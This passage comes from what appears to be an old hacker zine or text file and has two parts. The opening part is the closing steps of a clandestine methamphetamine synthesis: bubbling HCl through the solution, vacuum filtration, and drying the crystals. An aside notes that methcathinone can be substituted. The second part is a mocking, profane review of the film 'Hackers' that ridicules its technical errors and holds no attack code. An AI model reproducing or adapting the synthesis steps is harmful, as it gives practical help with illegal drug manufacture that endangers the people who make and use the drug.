awe-inspiring sight. In a few minutes, the solution becomes as thick as
|
|||
|
watery oatmeal.
|
|||
|
|
|||
|
It is now time to filter out the crystals, which is a two man job.
|
|||
|
The flask with the crystals in it is removed from the HCl source and
|
|||
|
temporarily set aside. The three-necked flask is swirled a little to
|
|||
|
spread around the sulfuric acid and then the other Erlenmeyer flask is
|
|||
|
subjected to a bubbling with HCl. While this flask is being bubbled, the
|
|||
|
crystals already in the other flask are filtered out.
|
|||
|
|
|||
|
The filtering flask and Buchner funnel are set up as shown in figure
|
|||
|
2. The drain stem of the buchner funnel extends all the way through the
|
|||
|
rubber stopper, because methamphetamine has a nasty tendency to dissolve
|
|||
|
rubber stoppers. This would color the product black. A piece of filter
|
|||
|
paper covers the flat bottom of the Buchner funnel. The vacuum is turned
|
|||
|
on and the hose attached to the vacuum nipple. Then the crystals are
|
|||
|
poured into the Buchner funnel. The solvent and uncrystallized
|
|||
|
methamphetamine pass through the filter paper and the crystals stay in the
|
|||
|
Buchner funnel as a solid cake. About 15 mL of solvent is poured into the
|
|||
|
Erlenmeyer flask. the top of the flask is covered with the palm and it is
|
|||
|
shaken to suspend the crystals left clinging to the sides. This is also
|
|||
|
poured into the Buchner funnel. Finally, another 15 mL of solvent is
|
|||
|
poured over the top of the filter cake.
|
|||
|
|
|||
|
|
|||
|
Figure 2:
|
|||
|
Ŀ
|
|||
|
<-Bchner Funnel
|
|||
|
___________
|
|||
|
\ /
|
|||
|
\ /
|
|||
|
\ /
|
|||
|
Ŀ
|
|||
|
<--To vacuum
|
|||
|
Ŀ
|
|||
|
|
|||
|
|
|||
|
Ŀ
|
|||
|
Filtering
|
|||
|
flask-->
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
Now the vacuum hose is disconnected and the Buchner funnel, stopper
|
|||
|
and all, is pulled from the filtering flask. All of the filtered solvent
|
|||
|
is poured back into the erlenmeyer flask it came from. It is returned to
|
|||
|
the HCl source for more bubbling. The Buchner funnel is put back into the
|
|||
|
top of the filtering flask. It still contains the filter cake of
|
|||
|
methamphetamine crystals. It will now be dried out a little bit. The
|
|||
|
vacuum is turned back on, the vacuum hose is attached to the filtering
|
|||
|
flask, and the top of the Buchner funnel is covered with the palm or
|
|||
|
section of latex rubber glove. The vacuum builds and removes most of the
|
|||
|
solvent from the filter cake. This takes about 60 seconds. The filter
|
|||
|
cake can now be dumped out onto a glass or China plate (not plastic) by
|
|||
|
tipping the Buchner funnel upside-down and tapping it gently on the plate.
|
|||
|
|
|||
|
And so, the filtering process continues, one flask being filtered
|
|||
|
while the other one is being bubbled with HCl. Solvent is added to the
|
|||
|
Erlenmeyer flask to keep their volumes at 300 mL. Eventually, after each
|
|||
|
flask has been bubbled for about seven times, no more crystal will come
|
|||
|
out and the underground chemist is finished.
|
|||
|
|
|||
|
If ether was used as the solvent, the filter cakes on the plates will
|
|||
|
be nearly dry now. With a knife from the silverware drawer, the cakes are
|
|||
|
cut into eighths. They are allowed to dry out some more then chopped up
|
|||
|
into powder. If benzene was used, this process takes longer. Heat lamps
|
|||
|
may be used to speed up this drying, but no stronger heat source.
|
|||
|
|
|||
|
[The above section of chapter 5 is talking about methamphetamine. You
|
|||
|
could, in most instances, substitute the word methcathinone, but I wanted
|
|||
|
to present the text to you in its exact form.]
|
|||
|
|
|||
|
|
|||
|
------------------------------------------------------------------------------

Review of "HACKERS"

By Wile Coyote

Sorry, it might be a little long... cut it to ribbons if you want, most
of it is just a rant anyway... Hope you enjoy it.

First off, I have to admit that I was biased going into the movie
"Hackers"... I heard that it wasn't going to be up to snuff, but did I
let that stop me? No, of course not... I sucked up enough courage to
stride towards my girlfriend and beg for seven bucks... :) She ended up
wanting to see the movie herself (and sadly, she rather enjoyed it...
oh, well, what can you do with the computer illiterate or is it the
computer illegitimate?). Now onto....

THE MOVIE

(Yes, I AM going to give you a second-by-second playback of the
movie... you don't want me to spoil the plot, you say? Well, don't
worry, there is no plot to spoil! :) just kidding, go see it... maybe
you'll like it...)

Well, from the very first few seconds, I was unimpressed... It begins
with an FBI raid on some unsuspecting loser (who turns out to be the
main character, but that's later) named Zero Cool (can you say "EL1EEEEET
WaReZ D00D!!!!!!!1!!!!!111!!!!"). The cinematography was bad... (Hey,
cinematography counts!) But, the acting was worse. The Feds bust into
this home and run up the stairs, all while this lady (the mom) just kind
of looks on dumbfounded and keeps saying stuff like "hey, stop that...",
or something (is this what a raid is like? I've never had the pleasure...)

Ok, so the story goes on like this: The 11 year old kid made a computer
virus that he uploads to, I think, the NY stock exchange, and it crashes
1,507 computers. There is a really lame court scene where the kid is
sentenced to 7 years probation where he can't use a computer or a
touch-tone phone... That was 1988...

Time passes... Now it's 1995, and boy have things changed (except the
mom... hmmm....). Now the ex-hacker is allowed to use a computer (his
18th b-day) and (somehow) he is just a natural at hacking, and is (gold?)
boxing some TV station to change the program on television (yes, I know
that all of you super-el33t hackers hack into TV stations when you don't
like what's on Ricki Lake!). N-e-way, while hacking into their
super-funky system (the screen just kind of has numbers moving up and
down the screen like some kind of hex-editor on acid...)
he gets into a "hacking battle" with some other hacker called Acid Burn
(I don't think I have ever seen such a trippy view of the "Internet"...
lots of Very high-end graphics, not very realistic, but it's Hollywood...).
In the end, the other hacker kicks the shit out of him (he has changed
his handle to Crash Override now, just to be cool, I guess) and logs him
off the TV station. Wow, tense... cough...

For those of you who care, let me describe the "hacker" Crash Override:
He is definitely super-funky-coole-mo-d-el31t-to-the-max, 'cause he is
(kinda) built, and wears VERY wicky (wicky : <adjective> weird plus wacky)
clothes, and the CDC might have quite a bit to say about the amount of
leather he wears... I mean, there are limits to that kind of stuff, man!
And to top off his coolness, he is, like, the roller-blade king of the
world. (Not that hackers don't roller-blade, but he does it just Soooo
much cooler than I could... :) ). And yet, here's the nifty part,
despite all of his deft coolness, he couldn't get a girl for the life
of him (we all mourn for him in silent prayer).

Ok, so now Crash is at school, and he meets Wonderchick (who is
EXACTLYFUCKINGLIKEHIM, and is, of course, an 3L31t hackerette... ok, she
is Acid Burn, the bitch who "kicked" him out of the TV station, sorry to
spoil the suspense).

Now, while at school, he wants to hook up with wonderchick, so he breaks
into the school's computer (it must be a fucking Cray to support all of
the high-end-type graphics that this dude is pulling up) and gets his
English(?) class changed to hers. So, some other super-d00dcool hacker
spots him playing around with the school's computer (it's funny how many
elite hackers one can meet in a New York public school...), so he
catches up with Crash and invites him to an elite (Oh, if you ever want
to see a movie where the word 3l333333333t is used, like a fucking
million times, then go see Hackers...) hackerz-only club, complete with
million-dollar virtual-reality crap and even a token phreaker trying to
red-box a pay-phone with a cassette recorder (never mind that the music is
about 197 decibels, the phone can still pick up the box tones...).

What follows is that Crash meets up with some seriously k-rad hackers
(Cereal Killer : reminds you of Mork & Mindy meets Dazed and Confused; and
Phantom Phreak : who reminds you of that gay kid on "my so called life...
maybe that was him?"; Lord Nikon : the token black hacker... Photographic
memory is his super-power). They talk about k00l pseudo-hacker shit and
then a l00ser warez-type guy comes up and tries to be El33t like everybody
else. He is just about the ONLY realistic character in the whole movie.
He acts JUST like a wannabe "Hiya D00dz, kan eye b k0ewl too?". He keeps
saying "I need a handle, then I'll be el33t!". (Why he can't just pick
his own handle, like The Avenging Turd or something, is beyond me... He
plays lamer better than the kids in Mighty Morphin Power Rangers... awesome
actor!). N-e-way, this is where the major discrepancies start. Ok,
first they try to "test" Lamerboy by asking him what the four most used
passwords are. According to the movie, they are "love, sex, god, and
secret". (Hmmmm.... I thought Unix required a 6-8 char. password....).
Somehow lamerboy got into a bank and screwed with an ATM machine four
states away; all of the hackers chastise him for being stupid and hacking
at home (If you watch the movie, you'll notice that the hackers use just
about every pay-phone in the city to do their hacking, no, THAT doesn't
look suspicious). Next they talk about "hacking a Gibson".
(I was informed that they WANTED to use "hacking a Cray",
but the Cray people decided that they didn't want THAT kind of publicity.
I've never heard of a Gibson in real life, though...).
They talk about how k-powerful the security is on a Gibson, and they say
that if Lamerboy can crack one, then he gets to be elite.

Soooooooo.... As the movie Sloooowly progresses (with a lot of Crash
loves Wonderchick, Wonderchick hates Crash kind of stuff) Lamerboy
finally cracks a Gibson with the password God (never mind a Login name or
anything that cool). Then the cheese begins in full force. The Gibson
is like a total virtual-reality thingy. Complete with all sorts of cool
looking towers and neon lightning bolts and stuff. Lamerboy hacks into a
garbage file (did I mention that the entire world is populated by Macs?
Oh, I didn't... well, hold on :)...). So, this sets alarms off all
over the place (cause a top-secret file is hidden in the garbage, see?),
and the main bad-guy, security chief Weasel, heads out to catch him. He
plays around with some neon, star-trek-console, buttons for a while,
then calls the "feds" to put a trace on the kid. La de da, ess catches him
in a second, and the kid only gets half of the file, which he hides.
(to spoil the suspense, yet again, the file is some kind of money getting
program, like the kind some LOD members wrote about a long time ago in
Phrack, which pulls money from each transaction and puts it into
a different account. Needless to say, the Security Weasel is the guy who
wrote it, which is why he needs it back, pronto!).

As we travel along the movie, the hackers keep getting busted for tapping
into the Gibson, and they keep getting away. The "action" heats up when
Wonderchick and Crash get into a tiff and they decide to have a hacking
contest... They go all over the city trying their best to fuck with
the one fed they don't like.... Brilliant move, eh? The movie kind of
reaches a lull when, at a party at Wonderchick's house, they see a k-rad laptop.
They all fondle over the machine with the same intensity that Captain Kirk
gave to fighting Klingons, and frankly, their acting abilities seem
to ask "please deposit thirty-five cents for the next three minutes".
It was funny listening to the actors, 'cause they didn't know shit about
what they were saying... Here's a clip:

Hey, cool, it's got a 28.8 bps modem! (Yep, a 28.8 bit modem... Not
Kbps, mind you :)...I wonder where they designed a .8 of a bit?)

Yeah! Cool... Hey what kind of chip does it have in it?

A P6! Three times faster than a Pentium.... Yep, RISC is the wave of
the future... (I laughed so hard..... Ok, first of all, it is a Mac.
Trust me, it has the little apple on the cover. Second it has a P6, what
server she ripped this out of, I dare not ask. How she got that
bastard into a laptop without causing the casing to begin melting is
yet another problem... those get very hot, I just read about them
in PC magazine (wow, I must be elite too). Finally, this is a *magic* P6,
because it has RISC coding....

I kinda wished I had stayed for the credits to see the line:

Technical advisor None.... died en route to work...)

Finally they ask something about the screen, and they find out it is
an..... hold your breath.... ACTIVE MATRIX! ... Kick ass!

They do lots of nifty things with their magic laptops (I noticed that they
ALL had laptops, and they were ALL Macintoshes. Now, I'm not one to say
you can't hack on a Mac, 'cause really you can hack on a TI-81 if you've
got the know.... but please, not EVERYONE in the fucking movie
has to have the exact same computer (different colors, though... there
was a really cool clear one).... it got really sad at the end), and they
finally find out what the garbage file that Lamerboy stole was, this time
using a hex editor/CAD program of some sort.

As we reach the end of the movie, the hackers enlist the help of two very
strangely painted phone phreaks who give the advice to the hackers to send
a message to all of the hackers on the 'net, and together, they all
kicked some serious ass with the super-nifty-virtual-reality Gibson.

In the end, all of the Hackers get caught except for one, who pirates all
of the TV stations in the world and gives the police the "real" story...
So, the police politely let them go, no need for actually proving that the
evidence was real or anything, of course.

So, in the end, I had to say that the movie was very lacking. It seemed
to be more of a Hollywood-type flashy movie, than an actual documentary
about hackers. Yes, I know an ACTUAL movie about hackers would suck, but
PLEASE, just a LITTLE bit of reality helps keep the movie grounded. It
may have sucked less if they didn't put flashing, 64 million color,
fully-rendered, magically delicious pictures floating all over the screen
instead of just a simple "# " prompt at the bottom. With all of the
super-easy access to all of the world's computers, as depicted in the movie,
ANYBODY can be a hacker, regardless of knowledge, commitment, or just
plain common sense. And that's what really made it suck...

Hope you enjoyed my review of HACKERS!